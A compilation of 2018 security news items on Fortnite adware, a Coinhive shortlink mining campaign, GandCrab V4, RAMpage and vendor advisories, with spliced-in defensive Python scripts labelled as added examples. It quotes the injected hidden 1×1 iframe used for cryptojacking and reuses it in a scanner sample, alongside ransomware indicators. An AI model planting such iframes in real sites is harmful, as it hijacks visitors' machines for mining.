If companies are too quick to disallow some kinds of software, they could prevent employees from accessing things at their workplaces that are genuinely helpful. In short, there is not a straightforward, fail-safe method for determining if a piece of software is safe or problematic. Even the most well-built software can have shortcomings.

4. We’re Living in a Global Economy
Wayne Jones, the chief information officer at the National Nuclear Security Administration, points out that instead of enforcing bans, the better approach to take is to figure out how to use software in ways that protect a company’s information.

He also brought up how we’re all living in a global economy, and that’s another reason why software bans don’t have the intended effect of bolstering cybersecurity.

The people who develop software and work on other tech-related projects often originate from foreign nations.

If the U.S. made a federal decision not to use equipment made by Huawei, would that ruling eventually progress to prevent anyone with past ties to the company from working for a United States business, then bar people from certain nations from taking tech-related jobs in the U.S.?

If so, the United States could find its tech development efforts substantially hindered, not to mention spend a significant amount of time determining which equipment features parts manufactured by countries on a theoretical “banned” list.

A Proactive Stance Is Essential
One thing people must remember is that cybercriminals tend to find ways to infiltrate systems even when doing so means overcoming obstacles. That means an outright ban on software — or anything else that might compromise cybersecurity — isn’t advisable.

Instead, organizations of all sizes must show proactiveness and learn to monitor for threats, counteract infiltration attempts and tighten their infrastructures when necessary.



Adware already infected at least 78000 Fortnite Players
5.7.2018 securityaffairs Virus

Rainway reported that tens of thousands of Fortnite players have been infected with adware while downloading fake V-Bucks generators.
Fortnite continues to be one of the most popular games, and crooks are attempting to target its millions of fans in different ways.

In June, experts observed cybercriminals attempting to exploit the interest in the forthcoming Fortnite Android release to infect millions of fans.

Users interested in the Android version of the popular game are not the only target: crooks are now also going after gamers searching for a Fortnite V-Bucks generator.

V-Bucks are the in-game currency that can be spent in both the Battle Royale PvP mode and the Save the World PvE campaign: in the former to purchase new customization items, in the latter to purchase Llama Pinata card packs.

Clearly many gamers search for v-buck generators, but these applications may hide dangerous malware.

Fortnite v-bucks

Researchers at the Web-based game-streaming platform Rainway reported that tens of thousands of Fortnite players have already attempted to download the fake generators with the result of infecting their systems.

The malicious code associated with this campaign is a strain of malware that hijacks encrypted HTTPS web sessions to inject fraudulent ads into every website the victim visits.

“On the early morning of June 26th, we began receiving hundreds of thousands of error reports to our tracker. Not feeling very excited to see such an influx of events on a Tuesday the engineering team was a bit flustered, after all, we hadn’t released any updates to that particular piece of our solution.” reads the blog post published by Rainway CEO Andrew Sampson.
The experts at Rainway started the investigation after noticing hundreds of thousands of error reports in their server logs. The internal staff discovered that their users’ systems were attempting to connect to various ad platforms.

Since the Rainway system only allows content to be loaded from whitelisted domains, all the requests discovered by the company, which attempted to download ads from other domains, were triggering connection errors.

Rainway experts analyzed hundreds of Fortnite hack tools, searching for the ones that generated the same errors reported by Rainway users.

Rainway discovered that the errors were generated by systems that were infected with a fake V-Bucks generator.
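The detection described above boils down to two observations: a client that only loads content from whitelisted domains turns every request to a foreign host into an error, and the same foreign hosts showing up from many distinct clients points at something installed on the users’ machines rather than one misbehaving client. The script below is an added example, not Rainway’s own tooling; the report format is not on the page, so the sample lines and the hostnames (under the reserved .example and .test domains) are constructed.

```python
"""
Spotting a shared infection from client error reports: an added example, not
Rainway's tooling. Sample lines are constructed; the logic mirrors what the
post describes (non-whitelisted hosts cause errors; many clients hitting the
same foreign ad host suggests adware on the clients, not a server-side bug).
"""
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Set, Tuple
from urllib.parse import urlparse

# Constructed sample reports; .example and .test are reserved names.
SAMPLE_REPORTS = [
    "2018-06-26T04:01:12Z client=c1 err=LOAD_FAILED url=https://cdn.rainway.example/app.js",
    "2018-06-26T04:01:13Z client=c1 err=BLOCKED url=https://ads.adnet.test/serve?key=abc",
    "2018-06-26T04:02:40Z client=c2 err=BLOCKED url=https://ads.adnet.test/serve?key=def",
    "2018-06-26T04:02:41Z client=c2 err=BLOCKED url=https://tracker.adnet.test/px.gif",
    "2018-06-26T04:03:05Z client=c3 err=BLOCKED url=https://ads.adnet.test/serve?key=ghi",
    "2018-06-26T04:03:06Z client=c3 err=LOAD_FAILED url=https://rainway.example/api/session",
    "this line is malformed and must be skipped",
]
ALLOWED_DOMAINS: Set[str] = {"rainway.example"}  # constructed whitelist

LINE_RE = re.compile(r"client=(?P<client>\S+)\s+err=\S+\s+url=(?P<url>\S+)")


def is_allowed(host: str, allowed: Set[str]) -> bool:
    """A host is allowed if it equals, or is a subdomain of, a whitelisted domain."""
    return any(host == d or host.endswith("." + d) for d in allowed)


def foreign_requests(lines: Iterable[str], allowed: Set[str]) -> List[Tuple[str, str]]:
    """(client, host) pairs for requests to hosts outside the whitelist."""
    out: List[Tuple[str, str]] = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # malformed report: skip it rather than crash the pipeline
        host = urlparse(m.group("url")).hostname
        if host and not is_allowed(host, allowed):
            out.append((m.group("client"), host))
    return out


def offending_hosts(lines: Iterable[str], allowed: Set[str]) -> Counter:
    """How many failed requests each non-whitelisted host accounted for."""
    return Counter(host for _, host in foreign_requests(lines, allowed))


def widespread_hosts(lines: Iterable[str], allowed: Set[str], min_clients: int = 2) -> List[str]:
    """Non-whitelisted hosts contacted by at least `min_clients` distinct clients."""
    clients: Dict[str, Set[str]] = defaultdict(set)
    for client, host in foreign_requests(lines, allowed):
        clients[host].add(client)
    return sorted(h for h, c in clients.items() if len(c) >= min_clients)


if __name__ == "__main__":
    print(offending_hosts(SAMPLE_REPORTS, ALLOWED_DOMAINS))
    print("seen from multiple clients:", widespread_hosts(SAMPLE_REPORTS, ALLOWED_DOMAINS))
```

The distinct-client threshold is what separates “one user with a broken browser extension” from “the same adware on many machines”; in a real deployment you would feed it the error tracker’s export and raise the threshold to fit your user base.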

Searching online, it is quite easy to find all kinds of software posing as a Fortnite hack tool; these applications are advertised through YouTube videos and claim to let players generate free V-Bucks, in addition to offering a classic aimbot.


Once the malicious code has infected the player’s system, it will immediately install a root certificate and configure the Windows machine to act as a proxy for the web traffic.

This specific campaign was delivering adware that alters the pages of a web request to inject ads.

The Rainway team was able to identify the servers hosting the malware; they had been compromised by attackers who were abusing them. The experts informed the company operating the compromised servers, which quickly removed the malware.

“Now, the adware began altering the pages of all web request to add in tags for Adtelligent and voila, we’ve found the source of the problem — now what?”

“We began by sending an abuse report to the file host, and the download was removed promptly, this was after accumulating over 78,000 downloads. We also reached out to Adtelligent to report the keys linked to the URLs. We have not received a response at this time. SpringServe quickly worked with us to identify the abusive creatives and remove them from their platform.” continues Rainway.

Rainway is warning gamers not to install hack tools or game cheats.

Given Fortnite’s popularity, we can imagine that many other cases will emerge in the forthcoming weeks.


Crooks leverage obfuscated Coinhive shortlink in a large crypto-mining operation
5.7.2018 securityaffairs Cryptocurrency

Crooks leverage an alternative scheme to mine cryptocurrencies: they don’t inject the CoinHive JavaScript miner directly into compromised websites.
Security researchers at Malwarebytes Labs have uncovered a new crypto mining campaign that relies on an alternative scheme to mine cryptocurrencies; unlike other campaigns, the crooks don’t inject the CoinHive JavaScript miner directly into compromised websites.

CoinHive also provides a “URL shortener” service that allows users to create a short link for any URL; the one difference from similar services is that it introduces a delay so that it can mine Monero cryptocurrency for an interval of time before redirecting the user to the original URL.

The redirection time is adjustable via Coinhive’s settings, this means that the attackers can force visitors’ web browsers to mine cryptocurrency for a longer period.

The experts at Malwarebytes discovered a large number of legitimate websites have been hacked by crooks to load short URLs generated using the CoinHive service through a hidden HTML iFrame. With this trick, attackers aim at forcing visitors’ browsers into mining cryptocurrencies.

“We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co/3h2b2. We believe it is part of the same campaign that was exposed by the folks over at Sucuri at the end of May.” reads the analysis published by Malwarebytes.

<iframe src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></iframe>
CoinHive JavaScript miner

“The cnhv[.]co domain name is used for what Coinhive calls shortlinks, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.”

This mining scheme is a novelty in the threat landscape because it doesn’t rely on injecting CoinHive’s JavaScript into the compromised websites.

Malwarebytes experts linked this last campaign to the one monitored by Sucuri researchers in May.

The attackers add obfuscated JavaScript code to the compromised websites; this code dynamically injects an invisible iframe (1×1 pixel) into the webpage as soon as it is loaded in the web browser.

The webpage then automatically starts mining until the Coinhive short-link service redirects the user to the original URL.
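The two traits the researchers describe, a blurb of hexadecimal that decodes to markup and a 1×1 iframe pointing at the cnhv.co shortlink domain, are enough to write a scanner for page source. The script below is an added example (not Malwarebytes’ or Sucuri’s tooling): it decodes long hex runs, extracts iframes from both the raw page and the decoded text, and reports hidden frames whose source is a Coinhive shortlink. The sample pages are constructed, and the hex blob is produced in the script from the iframe shown above rather than copied from a real infection; defanged hosts written as cnhv[.]co are accepted so the check also works on IoC lists.

```python
"""
Scanner for hex-encoded hidden Coinhive shortlink iframes: an added example,
not code from Malwarebytes or Sucuri. Sample pages are constructed.
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

SHORTLINK_HOSTS = {"cnhv.co"}  # Coinhive shortlink domain named in the post

# Whole runs of at least 20 hex byte pairs, not substrings of longer runs.
HEX_BLOB_RE = re.compile(r"(?<![0-9a-fA-F])(?:[0-9a-fA-F]{2}){20,}(?![0-9a-fA-F])")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']([^"']*)["']""")


def decode_hex_blobs(text: str) -> List[str]:
    """Decode every long hex run that turns out to be valid UTF-8 text."""
    decoded = []
    for blob in HEX_BLOB_RE.findall(text):
        try:
            decoded.append(bytes.fromhex(blob).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # hashes and other binary runs are not injected markup
    return decoded


def iframe_attrs(markup: str) -> List[Dict[str, str]]:
    """Lower-cased attribute dictionaries for each <iframe> in the markup."""
    return [{k.lower(): v for k, v in ATTR_RE.findall(m)} for m in IFRAME_RE.findall(markup)]


def is_hidden(attrs: Dict[str, str]) -> bool:
    """1x1 (or smaller) frames, display:none and visibility:hidden count as hidden."""
    def tiny(key: str) -> bool:
        try:
            return float(attrs.get(key, "").rstrip("px")) <= 1
        except ValueError:
            return False
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny("width") and tiny("height")) or "display:none" in style or "visibility:hidden" in style


def is_shortlink(src: str) -> bool:
    """True when src points at a Coinhive shortlink host (defanged 'cnhv[.]co' accepted)."""
    host = urlparse(src.replace("[.]", ".")).hostname or ""
    return host in SHORTLINK_HOSTS or any(host.endswith("." + h) for h in SHORTLINK_HOSTS)


def hidden_shortlink_iframes(html: str) -> List[str]:
    """src values of hidden shortlink iframes, found in the page or inside hex blobs."""
    hits = []
    for markup in [html] + decode_hex_blobs(html):
        for attrs in iframe_attrs(markup):
            src = attrs.get("src", "")
            if src and is_shortlink(src) and is_hidden(attrs):
                hits.append(src)
    return hits


# Constructed samples: the injected page carries the iframe as hex, as the post
# describes; the clean page has a visible frame and an unrelated hex string.
INJECTED_IFRAME = '<iframe src="https://cnhv.co/3h2b2" width="1" height="1" align="left"></iframe>'
INFECTED_PAGE = (
    '<html><body><p>hello</p><script>var h="' + INJECTED_IFRAME.encode().hex() + '";'
    'document.write(hexdecode(h));</script></body></html>'
)
CLEAN_PAGE = (
    '<html><body><iframe src="https://video.example/embed/1" width="640" height="360"></iframe>'
    '<meta name="build" content="' + "release build 2018-07-05".encode().hex() + '"></body></html>'
)

if __name__ == "__main__":
    print("infected:", hidden_shortlink_iframes(INFECTED_PAGE))
    print("clean:", hidden_shortlink_iframes(CLEAN_PAGE))
```

The hex decode step is the part that matters for this campaign: a plain iframe grep finds nothing on the infected sample because the markup only exists after the blob is decoded, and the UTF-8 check keeps checksum-like hex strings from producing noise.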


“In Figure 3 where we made the iframe visible by changing its dimensions, to show that rather than wait for a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page.” continues the analysis from Malwarebytes.
“Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.”
Experts also discovered that cybercriminals are injecting hyperlinks to other compromised websites to trick victims into downloading cryptocurrency miners for desktops that are disguised as legitimate software.

“In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online,” continues the researchers.

“In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners.”

Further technical details about the campaign, including the IoCs, are reported in the blog post.


The GandCrab ransomware V4 appears in the threat landscape
4.7.2018 securityaffairs Ransomware

A new variant of the infamous GandCrab ransomware, V4, was released during the weekend; experts have shared details of the threat.
A new version of the dreaded GandCrab ransomware (V4) was released during the weekend and according to the experts it included numerous changes.

Fly
@china591
New #GandCrab version "V4" GANDCRAB V4 Ransomware – Remove and Restore .KRAB Encrypted Files

Fly
@china591
Replying to @malwrhunterteam and 2 others
https://www.virustotal.com/#/file/ef7b107c93e6d605a618fee82d5aeb2b32e3265999f332f624920911aabe1f23/detection …https://app.any.run/tasks/daa35edf-94dc-416b-a7b1-fd45b6900c43 …

MD5: 97a910c50171124f2cd8cfc7a4f2fa4f
SHA-1: 3737d782cb64fa92d2c42f3c2857ee2295dc8aa4
Authentihash: d64152842b2b787a86bb5dd2084ae40efd9914df8a880eb242f67ce5447a46f6

10:29 AM - Jul 3, 2018
The GandCrab ransomware V4 uses a different encryption algorithm (likely the Salsa20 stream cipher) and a new TOR payment site (gandcrabmfe6mnef.onion); it appends the “.KRAB” extension to encrypted file names and uses a new ransom note name.

GandCrab ransomware V4

Marcelo Rivero
@MarceloRivero
· 3 Jul
#GandCrab #v4 🦀🆕
[+] Extension: ".KRAB"
[+] Internal version: 4.0
[+] Note: KRAB-DECRYPT.txt
[+] Tor: gandcrabmfe6mnef[.]onion
[-] No more wallpaper routine and no C2C. https://beta.virusbay.io/sample/browse/97a910c50171124f2cd8cfc7a4f2fa4f … pic.twitter.com/dvw604AKBG

Marcelo Rivero
@MarceloRivero
#GandCrab V4 internal version: 4.0 - seems to use now #Salsa20 stream cipher 🧐 pic.twitter.com/Op01bBC50g

4:42 AM - Jul 3, 2018
The GandCrab authors left a message in the code for Daniel J. Bernstein, the computer science professor at the University of Illinois at Chicago who created the Salsa20 algorithm.

@hashbreaker Daniel J. Bernstein let's dance salsa <3
According to malware researcher Fly, the GandCrab ransomware V4 is currently being distributed through fake software crack sites.

“The ransomware distributors will hack legitimate sites and setup fake blogs that offer software crack downloads. When a user downloads and runs these cracks, they will install the GandCrab Ransomware onto the computer.” wrote Lawrence Abrams from Bleeping Computer.

Like previous variants, when GandCrab ransomware V4 is executed it will scan the computer and network shares for files to encrypt.

Lawrence added that this variant enumerates all shares on the network and not just mapped drives. Once files are encrypted, the ransomware creates ransom notes named KRAB-DECRYPT.txt that include payment instructions. The ransom amount is currently $1,200 USD worth of DASH (DSH) cryptocurrency.

GandCrab ransomware V4

The TOR payment site includes a support section where victims can send messages to the developers and request to decrypt one file for free as the proof of their abilities.

The bad news is that, at this time, victims of GandCrab ransomware v4 cannot decrypt their files for free.


Rowhammer Evolves into RAMpage Exploit, Targeting Android Phones Since 2012
4.7.2018 securityaffairs Android

This week researchers demonstrated that most Android phones released since 2012 are still vulnerable to the RAMpage attack.
In 2012, security researchers identified a bug in modern DRAM (dynamic random access memory) chips that could lead to memory corruption.

In 2015, Google Project Zero researchers demonstrated “rowhammer”, a working exploit of this attack providing privilege escalation on vulnerable Linux and Windows systems. In 2016, researchers at VUSec published Drammer, demonstrating that the rowhammer technique could be used to gain root on Android devices. Google scrambled to fix the vulnerability in 2016, but this week researchers demonstrated that those fixes are incomplete and most Android phones released since 2012 are still vulnerable to the latest iteration of the attack, known as RAMpage. Since this is a hardware vulnerability, it is very difficult to retroactively “fix.”

The problem stems from memory chips that use very small internal data paths to maximize speed. While we may want computer memory to be free from corruption and consistent, the physics involved at such tiny scales has unintended consequences.

As written in the original academic paper, “[…] as DRAM process technology scales down to smaller dimensions, it becomes more difficult to prevent DRAM cells from electrically interacting with each other. […] By reading from the same row in DRAM, we show that it is possible to corrupt data in nearby addresses.” Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors, (Yoongu Kim, Ross Daly, Jeremie Kim, Chris Fallin, Ji Hye Lee, Donghyuk Lee, Chris Wilkerson, Konrad Lai, Onur Mutlu.) In other words, by repeatedly and quickly reading memory contents in DRAM Row 2, it may be possible to cause individual bits in Rows 1 or 3 to change from a 1 to a 0 or vice versa.

An interesting and concerning physical outcome, but it wasn’t until Google Project Zero researchers published a working exploit in 2015 that the risks became significant.


In the 2015 blog post, “Exploiting the DRAM rowhammer bug to gain kernel privileges”, Google security researchers explained that by using the rowhammer technique on two rows simultaneously (double-sided hammering), they were able to induce bit flips on a DRAM memory location between the two rows being read. Corrupting memory with electrical interference is a neat trick, but being able to change the memory bits to your choice is the start of a practical exploit and the researchers demonstrated an ability to gain privilege escalation on Windows and Linux systems. With privilege escalation, it may be possible to execute any malicious code on the target system. There are mitigations available to reduce the risks from rowhammer, but they require changes to hardware and some result in increased power consumption and reduced performance. Perhaps acceptable in desktop and server environments where security concerns override power consumption, but power is a prime concern in mobile devices — which were first shown to be vulnerable to rowhammer attacks in 2016.

Security researchers from VUSec in Amsterdam published a blog post in 2016 titled “Drammer: Flip Feng Shui Goes Mobile.” In this post, they described how a rowhammer attack could be used against mobile devices running Android OS to gain “root access” to the devices. The attack can be launched “by hiding it in a malicious app that requires no permissions.” Once the attacker has root access, they have full control of your mobile device and the information on that device. A patch for the Android kernel ION subsystem was released in November of 2016 which addresses the Drammer attack. Unfortunately, the Android environment still suffers from fragmentation and distribution challenges, so you can expect that many vulnerable devices have not yet received this patch. Of course, as we learned this week, even if you did receive the patch, you may still be vulnerable.

An international team of system security researchers published the paper “GuardION: Practical Mitigation of DMA-based Rowhammer Attacks on ARM,” which describes an evolution of the rowhammer attack into the attack they dub RAMPAGE. From the paper, RAMPAGE is described as “a set of DMA-based Rowhammer attacks against the latest Android OS, consisting of (1) a root exploit, and (2) a series of app-to-app exploit scenarios that bypass all defenses.” Acknowledging that the patch released in 2016 did address the “double-sided hammer” vulnerability, these researchers determined that by combining an attack that consumes all ION internal memory pools with their Flip Feng Shui exploit they were still able to gain root on the target Android device. As always, once the bad actors have root, they have access to everything on your phone.

Since the theoretical proposal in 2012, we have seen the same memory vulnerability exploited repeatedly with greater impact and relative ease. In the RAMpage researchers’ own words, “Over the last two years, the Rowhammer bug transformed from a hard-to-exploit DRAM disturbance error into a fully weaponized attack vector.” Being hardware-based, memory attacks like these are notoriously difficult to defend against. And if there is a viable defence, it usually increases costs or reduces performance, making it less likely to be deployed. We have to recognize that mobile devices are as capable as desktop computers and accept that they require similar protections, vulnerability management procedures and upgrades.

Do you consider your ability to patch and protect mobile systems when purchasing?


Siemens warns of several flaws affecting Central Plant Clocks
4.7.2018 securityaffairs ICS

Siemens disclosed several vulnerabilities in some of its SICLOCK central plant clocks, including ones that have been rated as “critical.”
Siemens is warning of the presence of six vulnerabilities in some of its SICLOCK central plant clocks, which are used to synchronize time in industrial environments.

“In the event of failure or loss of reception from the primary time source, the central plant clock ensures stable continuation of the clock time, and tracking of the system time without time jumps as soon as reception is restored.” reads the Siemens official website.

The vulnerabilities have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856, three of them have been classified as critical.

“SICLOCK TC devices are affected by multiple vulnerabilities that could allow an attacker to cause Denial-of-Service conditions, bypass the authentication, and modify the firmware of the device or the administrative client.” reads the security advisory.

One of the critical vulnerabilities tracked as CVE-2018-4851 could be exploited by attackers with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition and potentially reboot by sending it specially crafted packets.

The successful exploitation of this flaw doesn’t require user interaction.

“An attacker with network access to the device, could cause a Denial-of-Service condition by sending certain packets to the device, causing potential reboots of the device.” reads the security advisory.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed. The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

The second critical vulnerability, tracked as CVE-2018-4853, can be exploited by an attacker with access to UDP port 69 to modify the firmware on a vulnerable device.

The flaw could be exploited by an attacker to run his own code on the SICLOCK device.

Siemens Central Plant Clocks siclock

The third critical issue tracked as CVE-2018-4854 can be exploited by an attacker with access to UDP port 69 to modify the administrative client stored on the device.

“An attacker with network access to port 69/udp could modify the administrative client stored on the device.” continues the advisory.

“If a legitimate user downloads and executes the modified client from the affected device, then he could obtain code execution on the client system.”

Siemens also reported a high severity vulnerability that could be exploited by a network attacker to bypass authentication.

The other issues discovered by Siemens are a medium severity flaw that could be exploited to launch a man-in-the-middle (MitM) attack and intercept unencrypted passwords stored in client configuration files, and a low severity flaw that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The flaws impacted the SICLOCK TC100 and SICLOCK TC400.

Siemens did not release firmware updates for the products because they are being phased out; the industrial giant only provided workarounds and mitigations to reduce the risk of attacks.


Huawei enterprise and broadcast products have a crypto bug. Fix it now!
4.7.2018 securityaffairs Vulnerability

Huawei has rolled out security fixes for some enterprise and broadcast products to address a cryptography issue tracked as CVE-2017-17174.
Huawei has released security updates for some enterprise and broadcast products to address a cryptography issue that was discovered in late 2017.

The vulnerability, tracked as CVE-2017-17174, is related to the implementation of an insecure encryption algorithm and could be exploited in a MiTM attack to decrypt a session key and recover the content of the entire session.

“There is a weak algorithm vulnerability in some Huawei products. A remote, unauthenticated attacker may capture traffic between clients and the affected products.” reads the security advisory published by Huawei.

“Due to the use of insecure encryption algorithm, the attacker may decrypt the session key by some cryptanalytic operations and the traffic between the server and the client. Successful exploit may cause information leak.”

The following Huawei products using RSA encryption in TLS are potentially vulnerable:

The RSE6500 Recording and Streaming Engine version V500R002C00. A high-performance, full-HD recording and streaming engine that supports live video multicast and mobile Video on Demand (VoD).
The SoftCo unified communications software version V200R003C20SPCb00;
The VP9660 video conferencing multipoint control units version V600R006C10;
Multiple versions of its eSpace U1981 IP telephony and enterprise communications universal SIP gateway.
Huawei

Huawei rated the vulnerability as a 5.3 (medium) because it is not easy to exploit; the company has released software updates to address the flaw for all of the affected products except the unified communications software SoftCo, which has been deprecated.
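The advisory ties the weakness to products “using RSA encryption in TLS” without naming the exact algorithm, and the operator-side question after patching is whether a TLS endpoint still offers a key exchange that lets a captured session be decrypted later. The check below is an added example, not code from Huawei or the advisory; it assumes that the setting to verify is static RSA key transport (a session key encrypted under the server’s RSA key, with no forward secrecy), and shows a context that still offers it beside one that only offers ECDHE. Function names are hypothetical; the cipher-suite inspection uses Python’s standard ssl module, whose get_ciphers() reports the key exchange of every enabled suite.

```python
"""
Verifying that a TLS server configuration no longer offers RSA key transport.
Added example, not Huawei's code; assumes static RSA key exchange is the
setting to remove. Uses only the standard library.
"""
import ssl
from typing import List


def rsa_key_exchange_suites(ctx: ssl.SSLContext) -> List[str]:
    """Names of enabled suites whose key exchange is static RSA ('kx-rsa')."""
    return [c["name"] for c in ctx.get_ciphers() if c.get("kea") == "kx-rsa"]


def uses_rsa_key_exchange(ctx: ssl.SSLContext) -> bool:
    """True when the context would still negotiate a suite without forward secrecy."""
    return bool(rsa_key_exchange_suites(ctx))


def legacy_context() -> ssl.SSLContext:
    """Server context that still offers RSA key transport: the weak configuration."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # AES128-GCM-SHA256 is TLS_RSA_WITH_AES_128_GCM_SHA256: the session key is
    # encrypted under the server's RSA key, so a recovered key decrypts the session.
    ctx.set_ciphers("AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256")
    return ctx


def hardened_context() -> ssl.SSLContext:
    """Server context restricted to ephemeral (forward-secret) key exchange."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # !kRSA removes every suite that uses RSA for key exchange; RSA remains
    # usable for authentication (ECDHE-RSA-*), which is not the issue here.
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!kRSA:!aNULL:!eNULL")
    return ctx


if __name__ == "__main__":
    for label, ctx in (("legacy", legacy_context()), ("hardened", hardened_context())):
        print(f"{label}: RSA key-exchange suites = {rsa_key_exchange_suites(ctx)}")
```

The same inspection can be pointed at a live endpoint by wrapping a socket with each context and recording which suite gets negotiated, but the offline check above already catches the configuration mistake before deployment.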

Every flaw discovered in the products of Chinese and Russian firms raises alarm among governments that are already banning their solutions from critical infrastructure and government offices.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.